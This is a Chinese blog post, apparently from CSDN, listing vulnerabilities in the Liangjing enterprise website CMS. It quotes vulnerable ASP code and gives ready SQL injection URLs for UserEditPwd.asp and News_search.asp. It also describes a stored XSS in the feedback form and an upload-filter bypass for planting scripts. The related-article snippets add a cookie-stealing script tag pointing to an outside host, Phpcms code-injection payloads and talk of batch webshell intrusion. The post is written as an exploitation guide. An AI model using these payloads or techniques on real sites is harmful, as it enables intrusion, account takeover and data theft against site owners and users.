良精企业通用建站系统漏洞总汇

最新推荐文章于 2021-11-11 09:52:11 发布
最新推荐文章于 2021-11-11 09:52:11 发布
阅读量2.1k 收藏 1
点赞数
分类专栏: 漏洞 文章标签: 建站系统 cookies action email mobile 数据库

一,SQl注入漏洞

1,典型的Cookies注入

漏洞文件:Shownews.asp

问题代码:id=cstr(request(“id”))
Set rsnews=Server.CreateObject(“ADODB.RecordSet”)
sql=”update news set hits=hits+1 where id=”&id
conn.execute sql
sql=”select * from news where id=”&owen
rsnews.Open sql,conn,1,1
title=rsnews(“title”)
if rsnews.eof and rsnews.bof then
response.Write(“数据库出错”)

很明显,id参数没有经过过滤直接代入数据库查询,其中cstr只是将数值型转换成字符型,但是直接输入注语句会提示出错,因为头文件包含防注入系统,但它只对Get和Post过滤,却没有对Cookies过滤,这样就可以进行Cookies注入了,具体方法可以用注入中转或者GreenBrowser自带的Js插件,我就不多说了,详细步骤可以看我以前的文章。

2,字符型注入

漏洞文件:UserEditPwd.asp
问题代码:www.2cto.com Action=trim(request(“Action”))
UserName=trim(request(“UserName”))
if Action=”" and session(“UserName”)=”" then
response.redirect “UserServer.asp”
end if
if Action=”Modify” and UserName<>“” then
Set rsUser=Server.CreateObject(“Adodb.RecordSet”)
sqlUser=”select * from [User] where UserName=’” & UserName & “‘”
rsUser.Open sqlUser,conn,1,3
显然username只过滤了空格边代入数据库查询。这是字符型的注入,而且程序员很配合的没有使用防注入系统,注入就产生了。由于用了session验证,利用时首先注册一用户,我就以用户shaun为例,注入语句如下:http://www.2cto.com /UserEditPwd.asp?Action=Modify&UserName=shaun’ and ’1′=’1;
http://www.2cto.com /UserEditPwd.asp?Action=Modify&UserName=shaun’ and ’1′=’2;

3,搜索型注入

漏洞文件:News_search.asp
问题代码:key=Trim(request(“key”))
otype=Trim(request(“otype”))
BigClass=request(“BigClass”)
省略部分代码
Set rs= Server.CreateObject(“ADODB.Recordset”)
if otype=”title” then
sql=”select * from news where title Like ‘%”&key&”%’ order by id desc”
else
sql=”select * from news where content Like ‘%”&key&”%’ order by id desc”
end if
rs.open sql,conn,1,1

可以看到,key未经过过滤就进行了数据库查询,因此造成了搜索型注入,
注入语句参考:
http://www.2cto.com /News_search.asp?otype=title&Submit=搜索&key=1%’ and 1=1 ‘%’=’
http://www.2cto.com /News_search.asp?otype=title&Submit=搜索&key=1%’ and 1=2 ‘%’=’

二,跨站漏洞

漏洞文件:FeedbackSave.asp
问题代码:Add=trim(request.form(“Add”))
Postcode=trim(request.form(“Postcode”))
Mobile=trim(request.form(“Mobile”))
Fax=trim(request.form(“Fax”))
email=trim(request.form(“email”))
Language=trim(request.QueryString(“Language”))
省略部分代码
Set rs = Server.CreateObject(“ADODB.Recordset”)
sql=”select * from Feedback”
rs.open sql,conn,1,3
省略部分代码
rs(“CompanyName”)=trim(request.form(“CompanyName”))
rs(“Add”)=Add
rs(“Postcode”)=Postcode
rs(“Receiver”)=trim(request.form(“Receiver”))
rs(“Phone”)=trim(request.form(“Phone”))
rs(“Mobile”)=Mobile
rs(“Fax”)=Fax
rs(“email”)=email
rs(“title”)=trim(request.form(“title”))
rs(“content”)=htmlencode2(request.form(“content”))
rs(“Publish”)=trim(request.form(“Publish”))
if Language=”ch” then
rs(“Language”)=”0″
else
rs(“Language”)=”1″
end if
rs(“time”)=date()
rs.update
rs.close

这里Add,Postcode,Mobile,Fax,email等均没有进行过滤,可以再主题和Email那里填写代码,

三,上传漏洞:

漏洞文件:upfile_Other.asp
问题代码:fileExt=lcase(file.FileExt)
Forumupload=split(UpFileType,”|”)
for i=0 to ubound(Forumupload)
if fileEXT=trim(Forumupload(i)) then
EnableUpload=true
exit for
end if
next
if fileEXT=”asp” or fileEXT=”asa” or fileEXT=”aspx” then
EnableUpload=false
end if
if EnableUpload=false then
‘msg=”这种文件类型不允许上传!\n\n只允许上传这几种文件类型:” & UpFileType

这个是大家很常见的上传漏洞,可以上传php文件或者本地提交加空格绕过过滤,我就不多说了。

本文由左泪发表在:三年离歌

fengling132
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
通杀良精南方数据网软上传漏洞
12-16
通杀良精南方数据网软上传漏洞通杀良精南方数据网软上传漏洞通杀良精南方数据网软上传漏洞
良精企业智能建站管理系统
08-15
"良精企业智能建站管理系统"是一款基于PHP开发的开源企业网站管理平台,旨在帮助企业轻松构建和管理自己的官方网站。这款系统具有高度的灵活性和可定制性,使得企业网站的优化变得更加直接有效,避免了不必要的复杂...
良精cms php版漏洞,南方数据、良精系统、网软天下漏洞利用
weixin_36330518的博客
03-10 810
1、通过upfile_other.asp漏洞文件直接取SHELL直接打开userreg.asp进行注册会员,进行登录,(在未退出登录的状态下)使用本地上传文件进行上传代码如下:BODY {FONT-SIZE: 9pt; BACKGROUND-COLOR: #e1f4ee}.tx1 {BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px s...
良精管理系统漏洞
weixin_30896825的博客
05-12 400
主题:良精多风格多语企业网站管理系统漏洞难度:中知识点:脚本、跨站工具包:get.php MyBrower.exe qq.js漏洞处:公司名称跨站漏洞今天让大家看一下漏洞的利用方法 <script src=http://192.168.1.101/qq.js></script> 192.168.1.101/get.php是我们获得COOKIE的程序192.1...
良精cms php版漏洞,Phpcms 2008 漏洞整理
weixin_34357232的博客
03-10 401
盲注flash_upload.php?modelid=1product.php pagesize参数代码注射漏洞yp/product.php?pagesize=${@print(md5(admin))}yp/product.php?pagesize=${@phpinfo()}askarch_ajax.phpSQL注射漏洞ask/search_ajax.php?q=s%E6'/**/or/**/(...
良精企业管理系统注入漏洞
weixin_30387339的博客
09-11 401
漏洞文件: en/DownloadShow.asp chinese/DownloadShow.asp 漏洞利用: 在百度键入:inurl: (DownloadShow.asp?DownID=) 在谷歌键入:allinurl: DownloadShow.asp?DownID= 获得搜索页面地址复制下来.打开阿D2.32.将地址粘贴到检测地址栏里就会看到软件下方有很多可用注入点 比如:h...
良精企业智能建站管理系统 v1.06
11-05
良精企业智能建站管理系统 v1.06】是一款基于PHP开发的开源企业网站管理系统,旨在为企业提供高效、便捷的网站建设解决方案。该系统具备优化搜索引擎友好性,帮助企业网站在互联网上更容易被发现,减少网站建设和...
良精企业智能建站管理系统 v1.16
08-21
总的来说,"良精企业智能建站管理系统 v1.16" 是一个强大且灵活的企业建站工具,不仅提供了基本的网站管理功能,还支持SEO优化和自定义开发,适合有一定技术背景的企业或个人使用。通过深入理解这个系统,用户可以...
良精企业智能建站管理系统 v1.01
10-05
良精企业智能建站管理系统 v1.01】是一款基于PHP开发的开源企业网站管理系统,旨在为企业提供高效、便捷的网站建设解决方案。该系统具备优化搜索引擎友好性(SEO)的功能,帮助企业网站在搜索引擎中获得更好的排名...
通杀良精南方数据网软上传漏洞工具
02-16
具体漏洞文件路径要在源代码中修改![upfile_other.asp]上传木马文件记得加空格
良精南方网站系统拿webshell的教程
03-06
通过利用良精南方系统漏洞,实现进入网站后台,并上传 。马,得到一个webshell的教程,讲述详细,一看就会。利用该方法,可以配合工具实现批量拿站。
良精企业智能建站管理系统 v1.08
10-21
良精php企业网站管理系统是免费、开源的php企业网站管理系统,让企业网站优化不再走弯路,后台可先切换动态和静态,内置两个风格。LJCMS 简易安装说明良精LJCMS包含1个风格 本程序完全开源系统安装方法:1、服务器环境要求  PHP版本 5.2+ 、MySQL 5.0+ ;IIS6.0+mysql5.0+php+5.2.4;2、将根目录下的所有文件和文件夹上传到支持PHP+MYSQL的空间;3、运行安装目录install,根据安装提示进行安装;4、系统安装成功后,请删除install目录;5、访问网址:http://您的网址/admincp.php/ 登录后台,填写安装时设置的帐号,密码进行登录,修改网站配置系统和发布新闻、产品信息即可;提示:如果根目录下有.htaccess文件后台设置了为静态,请注意修改php配置文件伪静态属性,如果未配置可能报错。如果是IIS rewrite 为静态那么就把rewrite/httpd.ini复制到更目录并且给具后台选择为静态的形式做决定保留那个模式,为了避免报错的情况下请删除httpd.ini多的那个多于模式。注意:如果底部统计导致网站很卡 可
存在cookie注入南方数据cms
04-24
Windows2008建站不成功,显示不出来,最好用win10吧,win10显示正常
利用南方数据企业0day漏洞批量入侵
04-24
利用南方数据企业0day漏洞批量入侵
闪灵CMS医院建站系统(含小程序)
04-06
闪灵CMS医院建站系统(含小程序)以php+mysql进行开发,操作简单,便捷。程序特色:一:使搜索引擎更加容易抓取和索引二:提供更多的功能,提高用户的友好体验三:可用性的提高,提高用户的友好体验闪灵CMS医院建站系统(含小程序)系统使用方法:将文件上传至PHP空间,运行http://你的域名/install.php进行安装。只需两步即可安装完成,为了保证网站安全,请修改默认后台路径及数据库名称。闪灵CMS医院建站系统 v5.0 build20190905更新说明:1.修复:修复后台自定义设置在插入带引号的文本自动转码的问题2.修复:修复了手机模板产品及新闻分页链接只显示第一页的问题3.新增:新增了一键同步文章到自媒体平台,支持百家号、企鹅号、微信公众号闪灵CMS医院建站系统 v5.0 build20190920更新说明:1.优化:对开启httponly模式下无法读取cookie的主机作了兼容2.优化:https模式下对第三方分享代码做了兼容3.优化:联系页面百度地图的调用增加了对https协议的支持闪灵CMS医院建站系统 v5.0 build20191018更新说明:1.修复:修复了在同步本地文件到OSS时一个文件出错就终止上传的BUG2.优化:优化代码,消除了一些不影响正常功能的报错3.新增:精简了目录结构,删除了一些冗余文件闪灵CMS医院建站系统 v5.0 build20191025更新说明:1.修复:修复了在某些情况下后台可以直接编辑PHP文件的问题2.优化:会员中心邀请链接界面加入了一键复制及链接二维码,方便手机端用户操作3.优化:会员中心编辑个人信息及文章投稿时增加了防XSS攻击的过滤功能闪灵CMS医院建站系统 v5.0 build20191101更新说明:1.新增:在安装界面完成后,提供保存后台信息的功能,防止用户忘记后台路径或帐号秘密2.修复:修复了在https状态下,后台无法显示模板预览及帮助手册的问题3.修复:修复前台会员注册时储存型XSS漏洞闪灵CMS医院建站系统 v5.0 build20191108更新说明:1.修复:修复了后台download.php跨目录下载文件的问题2.修复:修复了在某些模板下调用全部产品和全部新闻的背景图出错的问题3.修复:修复了在使用微信登录/注册会员时无法获取邀请人信息的问题
全球95%的SAP企业管理系统存在安全漏洞
weixin_33809981的博客
05-14 171
2019独角兽企业重金招聘Python工程师标准>>> ...
良精南方cms /inc/Check_Sql.asp SQL Injection Based On Cookie
weixin_30940783的博客
09-09 236
catalog 1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考 1. 漏洞描述 Relevant Link:2. 漏洞触发条件 0x1: POC using System; using System.Collections; using System.Net; using System.Text...
最新系统漏洞--Ljcmsshop SQL注入漏洞
weixin_48555088的博客
11-11 1331
最新系统漏洞2021年11月9日 受影响系统: Ljcmsshop Ljcmsshop 4.3.R60321 描述: Ljcmsshop是中国Ljcms公司的一个基于Php开发的在线商城建站系统。 Ljcmsshop v4.3.R60321的/question.php存在SQL注入漏洞。攻击者可利用该漏洞获取敏感的数据库信息。 <**> 建议: 厂商补丁: Ljcmsshop 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: https://gith

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值